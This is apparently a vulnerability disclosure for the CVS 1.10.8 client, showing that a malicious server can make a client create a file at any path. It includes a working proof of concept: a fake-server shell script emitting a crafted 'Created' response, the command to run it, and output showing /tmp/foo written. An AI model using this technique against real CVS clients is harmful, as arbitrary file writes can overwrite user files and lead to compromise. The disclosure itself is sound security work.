I found a security problem that cvs server can instruct to create any
file at any locaiton in client machine.
For example, if a client tries to checkout a module `tst' as:
% cvs -f -d :ext:user@server:/cvsroot co tst
and server includes a dangerous response as follows to its responses,
the cilent creates /tmp/foo.
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
This problem can be test yourself easily as follows.
% ls -l /tmp/foo
ls: /tmp/foo: No such file or directory
% cat crackers-cvs-server
#!/bin/sh
cat <<'End'
Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot
Static-directory Sticky Checkin-prog Update-prog Entry Kopt Checkin-time Modified
Is-modified UseUnchanged Unchanged Notify Questionable Case Argument Argumentx
Global_option Gzip-stream wrapper-sendme-rcsOptions Set Kerberos-encrypt
expand-modules ci co update diff log add remove update-patches gzip-file-contents
status rdiff tag rtag import admin export history release watch-on watch-off watch-add
watch-remove watchers editors init annotate noop
ok
Module-expansion tst
ok
Clear-sticky tst/
/cvsroot/tst/
Clear-static-directory tst/
/cvsroot/tst/
E cvs server: Updating tst
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
ok
End
% CVS_RSH=./crackers-cvs-server cvs -f -d :ext:user@server:/cvsroot co tst
cvs server: Updating tst
cvs checkout: in directory /tmp:
cvs checkout: cannot open CVS/Entries for reading: No such file or directory
cvs checkout: cannot open CVS/Entries.Log: No such file or directory
% ls -l /tmp/foo
-rw-r--r-- 1 akr wheel 4 Jul 19 22:01 /tmp/foo
% cat /tmp/foo
abc
% cvs -v
Concurrent Versions System (CVS) 1.10.8 (client/server)
Copyright (c) 1989-1998 Brian Berliner, david d `zoo' zuhn,
Jeff Polk, and other authors
CVS may be copied only under the terms of the GNU General Public License,
a copy of which can be found with the CVS distribution kit.
Specify the --help option for further information about CVS
%
--
Tanaka Akira
